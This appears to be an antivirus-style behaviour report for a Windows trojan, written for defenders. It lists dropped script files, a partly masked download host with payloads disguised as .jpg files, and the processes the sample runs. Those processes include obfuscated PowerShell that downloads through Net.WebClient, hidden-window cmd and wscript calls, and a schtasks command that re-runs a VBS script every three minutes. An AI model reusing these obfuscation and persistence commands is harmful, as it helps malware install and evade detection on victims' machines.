Техническая информация
- <SYSTEM32>\tasks\set
- %ALLUSERSPROFILE%\set\iso\class.ps1
- %ALLUSERSPROFILE%\set\iso\xx.bat
- %ALLUSERSPROFILE%\set\iso\set.vbs
- %ALLUSERSPROFILE%\set\iso\set.bat
- %ALLUSERSPROFILE%\set\iso\xx.vbs
- 'sh#####ttracking.net':80
- http://sh#####ttracking.net//wp-content/uploads/SSL/xx.jpg
- http://sh#####ttracking.net//wp-content/uploads/SSL/error.jpg
- DNS ASK sh#####ttracking.net
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\Set\ISO\xx.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow__lo--tri__g'.repla...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\Set\ISO\xx.bat" "' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow__lo--tri__g'.repla...
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\Set\ISO\xx.bat" "
- '<SYSTEM32>\schtasks.exe' /create /tn Set /sc minute /mo 3 /tr "%ALLUSERSPROFILE%\Set\ISO\Set.vbs"